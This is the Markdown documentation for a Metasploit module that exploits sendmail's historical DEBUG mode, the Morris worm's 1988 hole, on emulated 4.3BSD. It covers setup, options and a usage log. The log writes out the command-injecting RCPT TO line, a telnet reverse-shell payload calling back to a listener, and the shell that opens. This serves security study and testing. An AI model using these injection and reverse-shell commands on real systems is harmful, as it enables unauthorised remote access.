102 lines
3.1 KiB
Markdown
102 lines
3.1 KiB
Markdown
|
## Intro
|
||
|
|
|
||
|
|
This module exploits `sendmail`'s well-known historical debug mode to
|
||
|
|
escape to a shell and execute commands in the SMTP `RCPT TO` command.
|
||
|
|
|
||
|
|
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
||
|
|
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
||
|
|
|
||
|
|
## Setup
|
||
|
|
|
||
|
|
A Docker environment for 4.3BSD on VAX is available at
|
||
|
|
<https://github.com/wvu/ye-olde-bsd>.
|
||
|
|
|
||
|
|
For manual setup, please follow the Computer History Wiki's
|
||
|
|
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
||
|
|
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||
|
|
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||
|
|
|
||
|
|
## Targets
|
||
|
|
|
||
|
|
```
|
||
|
|
Id Name
|
||
|
|
-- ----
|
||
|
|
0 @(#)version.c 5.51 (Berkeley) 5/2/86
|
||
|
|
```
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**RPORT**
|
||
|
|
|
||
|
|
Set this to the target port. The default is 25 for `sendmail`, but the
|
||
|
|
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
||
|
|
|
||
|
|
**PAYLOAD**
|
||
|
|
|
||
|
|
Set this to a Unix command payload. Currently only `cmd/unix/reverse`
|
||
|
|
and `cmd/unix/generic` are supported.
|
||
|
|
|
||
|
|
## Usage
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 exploit(unix/smtp/morris_sendmail_debug) > options
|
||
|
|
|
||
|
|
Module options (exploit/unix/smtp/morris_sendmail_debug):
|
||
|
|
|
||
|
|
Name Current Setting Required Description
|
||
|
|
---- --------------- -------- -----------
|
||
|
|
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
|
||
|
|
RPORT 25 yes The target port (TCP)
|
||
|
|
|
||
|
|
|
||
|
|
Payload options (cmd/unix/reverse):
|
||
|
|
|
||
|
|
Name Current Setting Required Description
|
||
|
|
---- --------------- -------- -----------
|
||
|
|
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
|
||
|
|
LPORT 4444 yes The listen port
|
||
|
|
|
||
|
|
|
||
|
|
Exploit target:
|
||
|
|
|
||
|
|
Id Name
|
||
|
|
-- ----
|
||
|
|
0 @(#)version.c 5.51 (Berkeley) 5/2/86
|
||
|
|
|
||
|
|
|
||
|
|
msf5 exploit(unix/smtp/morris_sendmail_debug) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP double handler on 192.168.1.5:4444
|
||
|
|
[*] 127.0.0.1:25 - Connecting to sendmail
|
||
|
|
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
|
||
|
|
[*] 127.0.0.1:25 - Sending: DEBUG
|
||
|
|
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
|
||
|
|
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
|
||
|
|
[*] 127.0.0.1:25 - Sending: DATA
|
||
|
|
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
|
||
|
|
[*] 127.0.0.1:25 - Sending: export PATH
|
||
|
|
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
|
||
|
|
[*] 127.0.0.1:25 - Sending: .
|
||
|
|
[*] 127.0.0.1:25 - Sending: QUIT
|
||
|
|
[*] Accepted the first client connection...
|
||
|
|
[*] Accepted the second client connection...
|
||
|
|
[*] Command: echo zqhqKJD7trW0E0Lp;
|
||
|
|
[*] Writing to socket A
|
||
|
|
[*] Writing to socket B
|
||
|
|
[*] Reading from sockets...
|
||
|
|
[*] Reading from socket B
|
||
|
|
[*] B: "zqhqKJD7trW0E0Lp\r\n"
|
||
|
|
[*] Matching...
|
||
|
|
[*] A is input...
|
||
|
|
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
|
||
|
|
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
|
||
|
|
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you
|
||
|
|
|
||
|
|
whoami
|
||
|
|
daemon
|
||
|
|
cat /etc/motd
|
||
|
|
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
||
|
|
|
||
|
|
Would you like to play a game?
|
||
|
|
```
|